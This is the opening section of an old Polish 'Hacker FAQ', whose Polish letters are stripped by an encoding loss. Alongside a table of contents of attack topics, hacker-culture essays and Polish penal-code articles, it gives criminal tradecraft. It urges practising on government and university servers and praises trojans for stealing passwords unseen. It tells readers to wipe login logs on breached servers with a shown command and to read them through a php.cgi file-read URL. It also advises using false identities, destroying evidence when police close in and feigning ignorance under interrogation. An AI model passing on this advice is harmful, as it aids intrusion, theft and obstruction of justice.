                                        =={ HACKER FAQ }==
                                      COPYRIGHT BY UNKNOW
                                         MR_LAMER@WP.PL
             "WIEDZA JEST NASZ TWIERDZ, IM WICEJ WIEMY, TYM CIʯEJ JEST NAS POKONA"

==============================================================================================
{ Tekst ten zosta napisany tylko i wycznie w celach edukacyjnych i autor nie ponosi       }
{ odpowiedzialnoci za szkody wywoane poprzez niewaciwe wykorzystanie zawartej tu wiedzy. }
==============================================================================================

UWAGA: Plik najlepiej przeglda przy uyciu WordPad'a, w trybie penoekranowym (1024x768)

==== FAQ WERSJA 3.0 ====

SPIS TRECI:
1.WSTP
2.Atak na serwer sposb I
3.Atak na serwer sposb II
4.Atak na serwer sposb III
5.Atak na E-MAIL
6.Program POLEDIT
7.Haso w BIOS'ie
8.Bdy w IE
9.Jak si wpisa do ksigi goci ;)
10.Trojany
11.Sztuczki do zncania si nad lamerami
12.Anonimowy E-Mail z Outlook Express :)
13.Anonimowo w sieci 8]
14.Zabawy z rejestrem :>
15.Program WS_FTP (to takie CO do publikowania WWW)
16.Troche oszustw telefonicznych...
17.Podszywanie si pod WWW :|
18.Social engeneering, czyli to co lubi najbardziej ;>
19.Hackowanie Sendmaila
20.Zlosliwe programy w Ms-Dos 8]
21.Jak shackowa stron WWW
22.Hackowanie plikw PWL
23.Unix & Linux
24.Numery seryjne Micro$oftu
25.IRC War
26.RUNDLL32 - Czyli co tkwi w windozie... 
27.WWWBoard
28.Hasa w Windows NT
29.Spis serwerw oferujcych konta shellowe
30.Spis wszystkich numerw telnetowych w USA
31.Hackowanie systemu VAX/VMS

*********************************************************************
1)

WSTP:

Na pocztku chciabym zacytowa fragment pewnej wypowiedzi:

<----cytat---->
"Hack co to wogole jest????????? TO pytanie zadaje sobie niemal codziennie. Niektorzy twierdza
ze jest to wlamywanie sie do systemow, robienie admina w konia, zmienianie strony www i takie tam
Ale dla mnie jest to styl zycia, zyje w sieci. To ONA jest dla mnie prawdziwym domem - tu mieszkam
tu ucze sie, tu sie bawie, tu mam przyjaciol. A hack jest jej najczystsza esencja. To nie ja zajmuje
sie hackiem ale to On mna. On mnie uczy, bawi i jest moim przyjacielem. Gdyby nie hack dawno bym juz
przestal istniec. Hack to nie wlamywanie sie do systemow, nie. To styl zycia i sposob myslenia. Jesli
sie tego nauczysz bedziesz hackerem."
<----cytat---->

JAK POWSTA WIAT - WEDUG HACKERW
<----cytat---->
W kazdym zinie musi byc cos co nie ma nic wspolnego z hackiem.Nie bedziemy od-
biegac od tej zasady i tez cosik takiego zamiescimy. Autora nie znam wiec tek-
st bedzie niepodpisany.
1. Na poczatku bylo slowo i w slowie byly dwa bajty,i wiecej nic nie bylo.
2. I oddzielil Bog jedynke od zera, i zobaczyl, ze to bylo dobre.
3. I Bog powiedzial: "Niech beda dane." I stalo sie.
4. I Bog powiedzial: "Niech uloza sie dane na swoje wlasciwe miejsca. I  stwo-
   rzyl dyskietki i twarde dyski, i kompaktowe dyski.
5. I Bog powiedzial: "Niech beda komputery, zeby bylo gdzie wlozyc  dyskietki,
   i twarde dyski i kompakty." I stworzyl komputery i nazwal  je  hardwarem, i
   oddzielil software od hardware`u.
6. Software`u jeszcze nie bylo,lecz Bog szybko stworzyl programy - duze i male
   i powiedzial im: "idzcie i rozradzajcie sie, i wypelniajcie cala pamiec."
7. Ale sprzykrzylo sie Bogu tworzyc programy samemu i rzekl:"Stworze Programi-
   ste wedlug swego podobienstwa, niech on panuje nad komputerami,  programami
   i danymi." I stworzyl Bog Programiste, i umiescil go w Centrum  Obliczenio-
   wym,  zeby w nim pracowal. I przyprowadzil on Programiste do drzewa katalo-
   gowego i powiedzial: "W kazdym katalogu mozesz uruchamiac programy, tylko z
   >Windows< nie korzystaj bo na pewno umrzesz."
8. I Bog rzekl: "Nie dobrze Programiscie byc samotnym, stworzymy mu tego, kto-
   ry bedzie sie zachwycal dzielem Programisty. "I wzial On od Programisty ko-
   stke, w ktorej nie bylo mozgu i stworzyl To, co bedzie zachwycalo sie dzie-
   lem Programisty, i przywiodl To do niego. I nazwal To Uzytkownikiem. I sie-
   dzieli oni razem pod nagim DOS-em i nie wstydzili sie tego.
9. Ale Bill byl chytrzejszy niz wszystkie dzikie zwierzeta, ktore uczynil  Pan
   Bog. I rzekl Bill do Uzytkownika: "Czy  na  prawde Bog powiedzial, zebyscie
   nie uruchamiali zadnych  programow ??? " I rzekl Uzytkownik: "W kazdym  ka-
   talogu mozemy uruchamiac programy, tylko z drzewa >Windows< nie mozemy aby-
   smy nie umarli "I rzekl Bill Uzytkownikowi: "Jak mozesz mowic o czyms, cze-
   go nie sprobowales!" Tego dnia,kiedy uruchomicie program z drzewa katalogo-
   wego >Windows< bedziecie rowni Bogu,bo jednym przyciskiem myszki stworzycie
   to, czego zapragniecie. "I zobaczyl  Uzytkownik, ze owoce Windows byly mile
   dla oczu i godne pozadania,bo jakakolwiek wiedza stala sie w tej chwili juz
   niepotrzebna, i zainstalowl Windows na swoim komputerze. I powiedzial  pro-
   gramiscie, ze to jest dobre, i on tez go zainstalowal.
10.I zaraz wyruszyl programista szukac nowych drajwerow. A Bog rzekl:"Gdzie i-
   idziesz?" A on odpowiedzial: "Ide szukac nowych drajwerow, bo nie ma  ich w
   DOS-ie." I wtedy rzekl Bog: "Kto  ci powiedzial, ze potrzebujesz drajwerow?
   Czy czasem nie uruchomiles programow z drzewa katalogowego >Windows< ?"  Na
   to rzekl programista:"Uzytkownik, ktorego mi  dales aby byl ze mna, zamowil
   programy pod Windows i dlatego zainstalowalem Windows." I rzekl Bog do Uzy-
   tkownika: " Dlaczego to uczyniles? " I odpowiedzial Uzytkownik: "Bill  mnie
   zwiodl."
11.Wtedy rzekl Pan Bog do Billa: " Poniewaz to uczyniles,  bedziesz  przeklety
   wsrod  wszelkiego bydla i wszelkiego dzikiego zwierza. I ustanowie nieprzy-
   jazn miedzy toba a Uzytkownikiem, on bedzie cie zawsze  przeklinal a ty be-
   dziesz mu sprzedawal Windows."
12.Do Uzytkownika zas Bog rzekl: Windows bardzo  rozczaruje  cie  i  spustoszy
   twoje zasoby,i bedziesz musial uzywac marnych programow,i nie bedziesz mogl
   sie obejsc stale bez serwisu programisty."
13.Programiscie zas rzekl: " Poniewaz usluchales glosu Uzytkownika,  przeklete
   niech beda twoje  komputery, gdyz powstanie w nich mnostwo  bledow i  wiru-
   sow, w pocie  oblicza  twego  bedziesz stale poprawial swoja prace."
14.I odprawil ich Pan Bog ze  swego  Centrum Obliczeniowego,  i   zabezpieczyl
   haslem wejscie do niego.
15.General protection fault.
<----cytat---->


Oto krtki opis charakterystyki hackera (z jakiego FAQ)

<----cytat---->
HACKER (definicja)

Zwykle zdolny programista i ekspert od komputerw dysponujcy rozleg wiedz i potraficy znakomicie korzysta z niej w praktyce. Hacker dziki swoim umiejtnociom jest w stanie ama najlepsze zabezpieczenia np. sieci komputerowych. Nawet wtedy gdy uywa swojej wiedzy do dziaa niezgodnych z prawem, nie powoduje szkd, nie niszczy danych, ani nie wykrada ich dla zysku, nie prbuje take zaciera za sob ladw w sposb brutalny, np. kasujc system operacyjny komputera, na ktry si wama. 

Termin "hacker" ludziom zwizanym z komputerami kojarzy si do jednoznacznie - w ich mniemaniu hackerzy postrzegani s jako przestpcy, niebezpieczni maniacy, ktrych naleaoby zamkn za kratkami dla dobra Ludzkoci. Takie mniemanie, mimo i nie pozbawione pewnych racji jest zazwyczaj mocno przesadzone, za bdne opinie i rozmaite mity, krce w komputerowym wiatku, bior si przewanie z braku zainteresowania czy wrcz celowej dezinformacji czsto wywoywanej przez media. Jednak prawda o hackerach zdecydowanie rni si od obiegowych teorii, jakie syszymy na co dzie w rodkach masowego przekazu. 
Wikszo problemw bierze si z niezrozumienia, kim waciwie s hackerzy i czym si zajmuj. Gdyby spyta ich, co oznacza termin "hacker", prawdopodobnie odpowiedzieliby, e chodzi o ciel lub stolarza, ktry w pracy korzysta z siekiery (takie jest wanie pierwotne znaczenie tego sowa!). W rodowiskach "wiadomych uytkownikw Sieci" egzystuje kilka (okoo piciu) obiegowych
definicji tego sowa, przy czym adne (!) z nich nie okrela hackera jako osobnika penetrujcego komputery i sieci komputerowe w celach destrukcyjno - dezorganizacyjnych. Tak dziaalno przypisuje si krakerom (crackerom); nie s oni zbyt lubiani przez reszt komputerowej spoecznoci (nic w tym dziwnego, skoro to oni s przyczyn podej reputacji komputerowych guru wrd sieciowej spoecznoci). 

HISTORIA

W czasach, gdy sieci komputerowe byy elementem wyposaenia niektrych
(bogatszych) uniwersytetw stanowych w USA, wikszo uytkownikw korzystaa z jednego komputera (klasy mainframe, wyposaonego w archaiczne pamici bbnowe i stosujcego podzia czasu). Nikt wtedy nie myla o hackerach jako modych wandalach przeklinanych przez przytaczajc wikszo "normalnych uytkownikw" . Wtedy (a bya to poowa lat siedemdziesitych) termin ten oznacza osobnika biegego w zagadnieniach zwizanych z komputerami - niemal wszyscy wywodzili si ze rodowisk uniwersyteckich i placwek naukowych USA. Z czasem pojcie to rozszerzono tak, e nie dotyczyo tylko komputerw i informatyki, ale te i innych dziedzin nauki (np. fizyki i elektroniki). Hackerstwo (ang. hackerdom lub hakerdom) wizao si mocno z ruchem hipisowskim. Do tej pory z tego ruchu hackerzy zaczerpnli tolerancj wyraana przez wspczesnych "komputerowcw" i skonno do wszelkiego rodzaju uywek. W miar rozwoju technologii teleinformatycznych domen hackerw staway si sieci komputerowe i systemy rozlege, w kocu "przerzucili si" te na Internet. 

Warto rwnie wspomnie o odamie czy te podgrupie hackerw, jak s
phreakerzy (inaczej phreakowie. ang. phreaks). Zajmuj si oni penetracj sieci telefonicznych i systemw BBS. std te wywodzi si nazwa najsynniejszej na wiecie grupy hackerskiej - 2600 Hz (jest to specyficzna czstotliwo standardu DTMF - tzw. hangup tone). Phreaking wywodzi si ze specyficznej "rozrywki", jak by kiedy tech-hacking - dziaalno polegajca na dokonywaniu drobnych (zazwyczaj) przerbek w rnych urzdzeniach (oprcz komputerw, ofiar takich artw paday np. ukady sterowania windami w akademikach czy dystrybutory napojw) - tak by zaskoczyy sw funkcjonalnoci innych uytkownikw. 

RODOWISKO

Obecnie, jak nietrudno si domyli, gwn "atrakcj" hackerw jest Internet, cho inne formy ich dziaalnoci, takie jak phreaking, ciesz si nadal pewn popularnoci. Oglnie rzecz biorc, gwn motywacj do dziaania hakerw jest ch dogbnego poznania danego tematu, tak e wkrtce staj si specjalistami w swej dziedzinie. Nie zadowala ich opanowanie np. obsugi komputerw w takim stopniu, jak innych uytkownikw (ich zdaniem - jest to wiedza minimalna, wystarczajca zaledwie do codziennej pracy), std te odnosz si do nich pobaliwoci czy wrcz pogard. Nie znosz te ignorantw wypowiadajcych si w kwestii, o ktrej nie maj gbszego pojcia (powstao nawet okrelenie takiego osobnika: lamer). Hackerzy zrzeszaj si w grupy (najwiksze z nich to 2600 Hz , Silicon Toad, Black Squadron), tworz w poszczeglnych krajach tzw. sceny hackerskie (jest to najwikszy rodzaj formacji, skupiajcy wiele grup analogicznie do demosceny), organizuj te imprezy, np. Hacking In Progress.
Szanujce si grupy maj wasne serwery internetowe, za pomoc ktrych dziel si z kadym uytkownikiem Sieci zdobyt wiedz. 

JZYK

Jednym z elementw charakteryzujcych t grup jest specyficzny jzyk,
identyfikujcy hackerw na caym wiecie, bez wzgldu na ich jzyk ojczysty. Powstay na bazie jzyka angielskiego (a waciwie amerykaskiego) konglomerat zawiera zarwno okrelenia slangowe, jak i duo fachowych okrele informatycznych. Efekt kocowy zwie si slangiem, argonem (ang. jargon) lub techspeakiem w zalenoci od tego, czy w jzyku przewaaj okrelenia fachowe (tzn. informatyczne), czy te dominuje jzyk "modzieowy". Jzyk ten - czy moe argon peen jest neologizmw, stosowane s take rozwizania oglnie okrelane mianem hackspeku (specyficzne skracanie wyrazw np. zamiast "for",
piszemy 4. "ck" zmienia si w "k") - wynalazki te narodziy si zapewne podczas dugich sesji przed terminalami tekstowymi. Jest te to jzyk zabawny, a nawet ironiczny; niestety, trudno posuy si sensownym przykadem z racji nieprzekadalnoci "argonu" na jzyk polski. Efektem komunikacji terminalowej jest te ASCII art - rysunki wykonane za pomoc standardowych znakw semigraficznych (to z nich rozwiny si emotikony a take inne serie zabawnych rysuneczkw, np. krowy). 

ETYKA

Podstawowym dogmatem ideologicznym hackerw jest swobodny przepyw informacji (we wszystkich jej postaciach). Std te wynika poczucie obowizku dzielenia si wiedz ze wszystkimi chtnymi (efektem tego s bogate zbiory wszelkiego rodzaju porad dla pocztkujcych "sieciowych szperaczy": manualz, exploitz, FAQs itp. dostpne w Internecie i na BBS-ach) i tworzenie darmowego oprogramowania. Niestety, niektrzy w imi tej szlachetnej idei posuwaj si odrobin za daleko (do amania zabezpiecze programw komercyjnych) - to odwieczna ko niezgody midzy informatycznym podziemiem a producentami software'u. Wikszo hackerw wykazuje te pewne tendencje anarchistyczne - przynajmniej w kwestii wolnoci sowa i braku autorytatywnego zwierzchnictwa w
Internecie. Generalnie potpiaj oni przemoc i przestpstwa komputerowe
popeniane "just for funn" - wamania do hostw internetowych s czym zym, chyba e w konkretnej sytuacji istnia racjonalny powd uzasadniajcy takie postpowanie. Zupenie inn kwesti jest nieszkodliwa eksploracja maszyn sieciowych i BBS-w. 

KULTURA

W zasadzie opiera si w caoci na komputerach; komputery s tematem "bada" hackerw, lecz s take medium pozwalajcym na komunikacj. W tym rodowisku powszechne s przyjanie z osobami, ktrych si nigdy nie widziao! W cigu dwudziestu lat (w przyblieniu tyle czasu dziaa ruch hackerski) wyksztaci si indywidualny, niepowtarzalny jzyk, powstaa te masa anegdot, dowcipw i mitw zwizanych ze synnymi informatykami (np. z Marvinem Minskym, Tomem Knightem i Davidem Moonem). Z historii popularnych w "rodowisku" przebija przewiadczenie o nadprzyrodzonym charakterze urzdze technicznych (gwnie komputerw, cho nie tylko), a take wiadomo, e hacker na co dzie obcuje z  "magi" (jednak uywane angielskie sowo magic ma troch inne znaczenie ni w jzyku powszednim). Powstaj nawet poematy traktujce o "bohaterach informatyki" - przykadem jest "Historia Mela. Prawdziwego Programisty" napisana przez Eda Natchera. 

TRYB YCIA

Jak nietrudno zgadn, przytaczajca wikszo "komputerowych guru" to
mczyni (ciekawe dlaczego), raczej modzi (tzn. do trzydziestego roku ycia). Wikszo "starej kadry" czyli pionierw hackerstwa, pracuje teraz w powanych korporacjach informatycznych, takich jak np. Netscape Communications. Styl ycia przedstawicieli informatycznego podziemia nie zmieni si zbytnio przez ten czas - nadal zdominowany jest przez amerykask kultur masow. Styl ten charakteryzuje si lekcewacym podejciem do rzeczywistoci i immanentnym cynizmem wyraanym w kontaktach midzyludzkich. Lecz hackerw cechuje take optymizm i (swoiste) poczucie humoru, bdce gwnym motorem do tworzenia rnych dowcipw (nie wyczajc atakw sieciowych!). Wida to zreszt na przykadzie ich jzyka - uywane skrty, arty, argonowe okrelenia i publikowane dokumentacje nacechowane s specyficznym i niepowtarzalnym dowcipem, by moe nieco trudnym do zrozumienia dla przecitnego netsurfera. Hackerom nieobce s "lekkie" narkotyki (marihuana, LSD), niektrzy z nich twierdz, i uywaj tego typu rodkw by zwikszy efektywno pracy przy komputerze. Lubi literatur science fiction, suchaj rocka (lub coraz czciej muzyki elektronicznej), do swobodnie wypowiadaj si w kwestii religii (spor popularnoci ciesz si wrd hackerw religie i filozofie Dalekiego wschodu, a take nurty neopogaskie) i polityki. 
<----cytat---->


Jeli chcesz zosta hackerem, to musisz wiedzie, e:
- Aby zosta hackerem, nie wystarczy interesowa si informatyk, trzeba umie na komputerze zrobi
  niemal wszystko !!! :|
- Kady (nawet najgorszy) hacker MUSI umie programowa. Ideaem jest tu znajomo:
   * ASSEMBLER (Mona w nim napisa trojana, wirusa i cokolwiek tylko chcesz :>)
   * C++ (Na tym opiera sie caly internet, UNIX'y i Linux'y...)
   * PASCAL 7.0 (Mona napisa program hackerski)
   * HTML (Mona wtedy uy tzw. podszywania si pod strony i bugow w IE)
   * JAVASCRIPT (Mona napisa prostego wirusa na stronie WWW...)
   * PLIKI WSADOWE (Moe to prymitywne, ale ma due moliwoci !!!)
- Jako hacker MUSISZ mie dostp do internetu lub jakiejs innej sieci (bo przez co chcesz si niby wamywa)
- Przypominam wszystkim, e hackerstwo jest w polsce karane wicieniem, grzywn itp.
- Pamitaj, e ycie hackera NIE jest ani troszk podobne do tego co wida na filmach :(
  Jedyne co robisz, to siedzisz przed komputerem, czytasz, czytasz, czytasz i... czytasz
  FAQ hackerskie, a od czasu do czasu wamujesz si do jakiego tam serwera FBI... ;)
- Musisz wiedzie, e na hackerstwie NIE da si zarobi. A jeeli przychodzi Ci do gowy
  kradzie kart kredytowych, to wtedy mylisz o zodziejstwie, a nie hackerstwie !!!
- Jako hacker, musisz nieustannie si doksztaca, poprzez:
   * Rnego typu grupu dyskusyjne na temat Hackerstwa, Zabezpiecze i Komputerw (np. PL.COMP.SEURITY)
   * Hackerskie kanay IRC np #HACKPL (tam jest sama elita !!!)  #HACKERS itp.
   * ciganie z sieci DOBRYCH programw hackerskich.
     Dla nie wtajemniczonych dodam: NETBUS, PROSIAK, WIN_NUKE...
     TO NIE S PROGRAMY HACKERSKIE, chocia czsto s przez hackerw uywane, ale nie
     po to, aby drczy lamerw, lecz aby wykrada pliki, programy, hasa itp. z dysku
     ofiary. Sztuk jest tak koysta z trojana, aby nie zosta wykrytym !!!
   * Czytanie stron hackerskich i innych zwizanych z tym tematem (ich spis jest na kocu
     tego FAQ)
   * Powiniene rwnie wstpi do jakiej grupy hackerskiej (no chyba e jeste samotnikiem...)
   * Naturalnie podstawa doksztalcania jest praktyka - czyli zabawa na np. serwerkach rzadowych lub uczelnianych
     (liste znanych serwerow uczelnianych zamieszczam na koncu tego FAQ)

Oto rady dla pocztkujcych hackerw:

- Zamiast wiczy ataki na serwerach i komputerach publicznych, powicz na swoim komputerze !!!
  Ideaem jest, gdy posiadamy dwa (lub wicej) komputery zczone w sie, w tedy moemy 
  przeprowadza atak, w warunkach podobnych do tych panujcych w internecie.
- Wszystkie materiay - czyli FAQ, programy hackerskie itp. - przetrzymuj na dyskietkach, lub
  na dysku w formie spakowanej, zakodowanej i ukrytej w jakim dziwnym miejscu 
  Przykadem dziwnego miejsca na dysku moe by (jesli masz windows):
   * C:\WINDOWS\SYSTEM\
   * C:\WINDOWS\SYSTEM\DATA\
   * C:\PROGRAM FILES\BDE\SETUP\
   * C:\WINDOWS\EXECUTE\
   * C:\WINDOWS\SETUP\
  P.S Nigdy nie ukrywajmy plikw w katalogu C:\WINDOWS\TEMP\ i C:\WINDOWS\RECENT\ gdy ten 
      katalog jest oprniany przez niektre programy.
- Do kodowania najlepiej jest uy programu PGP w wersji nowszej ni 5.5, bo ta wersja ma 
  wbudowan funkcj (wprowadzon przez FBI) automatycznego rozkodowywania plikw (wprowadzono ja na potrzeby FBI)
- Podczas cigania pliku, zmieniaj jego nazwe. To znaczy, zamiast ciga danych do 
  pliku: HACKER.ZIP cignijmy je np. do pliku PAMELA69.JPG po cigniciu pliku, moemy naturalnie
  zmieni jego nazwe.
  Caa zabawa polega na tym, e policja, polskie FBI itp. mog zdoby wydruk twoich pocze 
  internetowych. Mona z nich dowiedzie si tego, jakie strony ogldalimy i jakie pliki 
  cigalimy. Tego, jakie E-MAILE wysyamy i jakiego programu hackerskiego uywamy, jest
  w obecnych czasach niewykrywalne :)
- Staraj si zabezpieczy swojego M$ WINDOS'a lub jak kto woli WINDOWSA przy uyciu jakiego hasa
  Dla ciemnych dodam, e NIE MOE to by zwyke standardowe zabezpieczenie przez panel sterowania,
  bo takie g*** to moe rozwali nawet najwikszy ciemniak !!!
- Nie zostawiaj nigdzie swojego imienia, nazwiska, telefonu i innych
  danych. Nie posluguj sie tez danymi innych ludzi, zawsze uzywaj falszywych
  danych. Poza tym nie hacz z kont, ktore dali ci znajomi administratorzy.
- Na zhakowanych kontach uzywaj najlepiej imion kobiecych, sa mniej
  podejrzane.
- Uwazaj z kim wymieniasz wiadomosci.
- Nie dawaj nikomu telefonu, kogo nie znasz.
- Nie hacz komputerow rzadowych, zostaw cos dla mnie ;)
- Badz podejrzliwy!
- ZAWSZE wamuj si przez dial-up TP s.a (wykrycie czego graniczy z cudem)
- Gdy ktos cie bedzie podejrzewal to na jakis czas zrezygnuj z zabaw w
  hackera i zostaw Siec w spokoju. Nie wysylaj kumplom zadnych rzeczy
  sluzacych do wiadomych celow i powiedz zeby oni zrobili to samo.

JAK WYSYA MAILE DO PRZYJACIӣ:

Wszystkie maile wysyaj z konta zarejestrowanego na osob speniajc podane niej warunki:
- osoba ta musi by mieszkajca poza Polsk, w miecie >1 000 000 osb
- wiek tej osoby musi by tak gdzie 50-80 lat (mae podejrzenia)
- osoba ta powinna by kobiet (mao kto sprawdza kobiety)
- w zainteresowaniach osoby wpisz: sport, muzyka, kino itp. (byle nie komputery i internet)
- w miejscu telefonu wpisz 0700... (kocwke spisz z jakiej reklamy)

----------------------------------------------------------------------------------------------
JAK SIE UKRYWA:

- Po udanym "skoku" zmie wpisy w podanych plikach na serwerze: (polecam przez TELNET)
  /var/log/wtmp    - log "ogolny"
  /var/run/utmp    - przechowuje informacje o zalogowanych osobach.
                     Wpisz "echo -n >/var/run/utmp" aby ukryc sie przed
                     who czy fingerem
  /var/log/lastlog - zawiera informacje o ostatnim zalogowaniu. Jesli
                     go skasujesz - informacja ta nie bedzie sie pojawiala
                     przy logowaniu na konto.
  P.S Dla ciemnych dodam, e do tych plikw dostajemy si komend: 
      "http:///webpage_goes_here/cgi-bin/php.cgi?/plik/do/przejrzenia"

- Jeli namierzy cie policja, FBI itp. polecam dokona takich zmian w systemie:
   - Usun wszystkie FAQ, ale moje gdzie ukryj ;)
   - Usun wszystkie programy hackerskie
   - Skasowa katalog C:\WINDOWS z dysku (tam jest temp, recent, tapety, ustawienia programw hackerskich, tymczasowe
     pliki internetowe, adresy stron jakie odwiedzilimy i wiele innych danych, ktre mog nas zdradzi)
   - Naley ponownie zainstalowa WINDOWS, ale bez zbdych dodatkw (gry zainstaluj koniecznie, bo to cecha
     charakterystyczna dla lamera)
   - Zmie waciwoci ekranu na: brak tapety, rozdzielczo 640x480, 256 kolorw (16 to troche mao)
   - Jeli to moliwe, to zainstaluj na dysku duo wersji DEMO (nie penych) rnych gier
   - Zmie etykiete dyskw twardych na jak debiln np. GIERY, INDOS itp.
   - Nie umieszczaj adnych skrtw na pulpicie (lamer ma zazwyczaj "dziewiczy pulpit", czyli bez zbdych ikonek)
   - Skasuj wszystkie wiadomoi z "skrzynki odbiorczej" i oprnij "Ksike adresow" (nie chcesz chyba 
     wrobi kolegw...)

- Jeli kto by cie przesuchiwa, to udaj kompletnego lamera, czyli:
  - Nie znasz adnej nazwy programu hackerskiego
  - Uywasz normalnych nazw, a nie potocznych (czyli zamiast "twardziel" mwisz "mj dysk twardy")
  - Pamitaj aby pisa DWOMA palcami (to charakterystyczne dla lamerw)
  - Zmniejsz szybko pisania na klawiaturze i podczas pisania "szukaj" liter.
- Jeli poka ci wykaz pocze, to powiedz, e z twojego komputera czsto koystaj koledzy :) (stracisz kolegw...)
- Niegdy nie mw e umiesz koysta z kawiarenki internetowej (IRC to dla ciebie czarna magia)
----------------------------------------------------------------------------------------------

ETYKA HACKERA:

1.Hacker nie atakuje serwera dla pienidzy, ale dla sprawdzenia swoich umiejtnoi...
2.Hacker nigdy nie ujawnia si publicznie, nie posiada kont email zaoonych na swoje nazwisko, zawsze podaje
  faszywe dane.
3.Hacker nigdy nie niszczy danych, on je wykrada na WASNY poytek...
4.Hacker nigdy nie sprzedaje wykradzionych danych i nie udostpnia ich innym hackerom...
5.Hacker jest zobowizany spisa swoje dokonania w postaci FAQ, aby mc szkoli kolejne pokolenie hackerw
6.Hacker zna rne metody wama, ale nie podaje ich pierwszemu lepszemu lamerowi mwicemu np.: "Jak si wama do...",
  "Pom mi wykra email'e koledze...", "Jakie s zabezpieczenia w pracowni komputerowej" (najczstsze pytanie w szkole)
7.Hacker zawsze robi kopje zapasow stron lub programw ktre zmienia i po pewnym czasie przywraca wszystko na miejsce
8.Hacker musi zachowywa si w sposb normalny, nie rzucajcy si w oczy i nie podejrzany (dziki temu nigdy nie
  bdzie rozmawia z rodzin przez szybke, ubrany w pasiasty strj)
9.Hacker zawsze zostawia system w takim stanie, w jakim go zasta
----------------------------------------------------------------------------------------------
Co mi grozi - czyli fragment nowego kodeksu karnego:

Art. 267. 

 1. Kto bez uprawnienia uzyskuje informacje dla niego nie przeznaczon, otwierajc zamknite pismo, podczajc si do przewodu sucego do przekazywania informacji lub przeamujc elektroniczne, magnetyczne albo inne szczeglne jej zabezpieczenie, podlega grzywnie, karze ograniczenia wolnoci albo pozbawienia wolnoci do lat 2.

 2. Tej samej karze podlega, kto w celu uzyskania informacji, do ktrej nie jest uprawniony, zakada lub posuguje si urzdzeniem podsuchowym, wizualnym albo innym urzdzeniem specjalnym.

 3. Tej samej karze podlega, kto informacj uzyskan w sposb okrelony w  1 lub 2 ujawnia innej osobie.

 4. ciganie przestpstwa okrelonego w  1 -3 nastpuje na wniosek pokrzywdzonego.



Art. 268. 

 1. Kto nie bdc do tego uprawnionym, niszczy, uszkadza, usuwa lub zmienia zapis istotnej informacji albo w inny sposb udaremnia lub znacznie utrudnia osobie uprawnionej zapoznanie si z ni, podlega grzywnie, karze ograniczenia wolnoci albo pozbawienia wolnoci do lat 2.

 2. Jeeli czyn okrelony w  1 dotyczy zapisu na komputerowym noniku informacji, sprawca podlega karze pozbawienia wolnoci do lat 3.

 3. Kto dopuszcza si czynu okrelonego w  1 lub 2, wyrzdza znaczn szkod majtkow, podlega karze pozbawienia wolnoci od 3 miesicy do lat 5.

 4. ciganie przestpstwa okrelonego w  1 -3 nastpuje na wniosek pokrzywdzonego.



Art. 269. 

 1. Kto na komputerowym noniku informacji, niszczy, uszkadza, usuwa lub zmienia zapis o szczeglnym znaczeniu dla obronnoci kraju, bezpieczestwa w komunikacji, funkcjonowania administracji rzdowej, innego organu pastwowego lub administracji samorzdowej albo zakca lub uniemoliwia automatyczne gromadzenie lub przekazywanie takich informacji, podlega karze pozbawienia wolnoci od 6 miesicy do lat 8.

 2. Tej samej karze podlega, kto dopuszcza si czynu okrelonego w  1, niszczc albo wymieniajc noniki informacji lub niszczc albo uszkadzajc urzdzenie suce automatycznemu przetwarzaniu, gromadzeniu lub przesyaniu informacji



Art. 270. 

 1. Kto, w celu uycia za autentyczny, podrabia lub przerabia dokument lub takiego dokumentu jako autentycznego uywa, podlega grzywnie, karze ograniczenia wolnoci albo pozbawienia wolnoci od 3 miesicy do lat 5.

 2. Tej samej karze podlega, kto wypenia blankiet, zaopatrzony cudzym podpisem, niezgodnie z wol podpisanego i na jego szkod albo takiego dokumentu uywa.

 3. Kto czyni przygotowania do przestpstwa okrelonego w  1, podlega grzywnie, karze ograniczenia wolnoci albo pozbawienia wolnoci do lat 2.



Art. 276. 

Kto niszczy, uszkadza, czyni bezuytecznym, ukrywa lub usuwa dokument, ktrym nie ma prawa wycznie rozporzdza, podlega grzywnie, karze ograniczenia wolnoci albo pozbawienia wolnoci do lat 2.



Art. 278. 

 1. Kto zabiera w celu przywaszczenia cudz rzecz ruchom, podlega karze pozbawienia wolnoci od 3 miesicy do lat 5.

 2. Tej samej karze podlega, kto bez zgody osoby uprawnionej uzyskuje cudzy program komputerowy w celu osignicia korzyci majtkowej.

 3. W wypadku mniejszej wagi, sprawca podlega grzywnie, karze ograniczenia wolnoci albo pozbawienia wolnoci do roku.

 4. Jeeli kradzie popeniono na szkod osoby najbliszej, ciganie nastpuje na wniosek pokrzywdzonego.

 5. Przepisy  1, 3 i 4 stosuje si odpowiednio do kradziey energii lub karty uprawniajcej do podjcia pienidzy z automatu bankowego.



Art. 287. 

 1. Kto, w celu osignicia korzyci majtkowej lub wyrzdzenia innej osobie szkody, bez upowanienia, wpywa na automatyczne przetwarzanie, gromadzenie lub przesyanie informacji lub zmienia, usuwa albo wprowadza nowy zapis na komputerowym noniku informacji, podlega karze pozbawienia wolnoci od 3 miesicy do lat 5.

 2. W wypadku mniejszej wagi, sprawca podlega grzywnie, karze ograniczenia wolnoci albo pozbawienia wolnoci do roku.

 3. Jeeli oszustwo popeniono na szkod osoby najbliszej, ciganie nastpuje na wniosek pokrzywdzonego.



Art. 291. 

 1. Kto rzecz uzyskan za pomoc czynu zabronionego nabywa lub pomaga do jej zbycia albo t rzecz przyjmuje lub pomaga do jej ukrycia, podlega karze pozbawienia wolnoci od 3 miesicy do lat 5.

 2. W wypadku mniejszej wagi, sprawca podlega grzywnie, karze ograniczenia wolnoci albo pozbawienia wolnoci do roku.



Art. 292. 

 1. Kto rzecz, o ktrej na podstawie towarzyszcych okolicznoci powinien i moe przypuszcza, e zostaa uzyskana za pomoc czynu zabronionego, nabywa lub pomaga do jej zbycia albo t rzecz przyjmuje lub pomaga do jej ukrycia, podlega grzywnie, karze ograniczenia wolnoci albo pozbawienia wolnoci do lat 2.

 2. W wypadku znacznej wartoci rzeczy, o ktrej mowa w  1, sprawca podlega karze pozbawienia wolnoci od 3 miesicy do lat 5.



Art. 293. 

 1. Przepisy art. 291 i 292 stosuje si odpowiednio do programu komputerowego.

 2. Sd moe orzec przepadek rzeczy okrelonej w  1 oraz w art. 291 i 292, chociaby nie stanowia ona wasnoci sprawcy
----------------------------------------------------------------------------------------------
Oto historja najsynniejszego hackera (wszech)czasw:
[zamieszczam j w FAQ, bo jest to historia, jak musi zna KADY szanujcy si hacker]

<----dokadnie zernite z innego FAQ---->
Jednym z obecnie najsawniejszych hackerw na wiecie jest oczywiscie
Kevin Mitnick (Kondor). Take to czowki zalicz si John Draper (Captain Crunch)

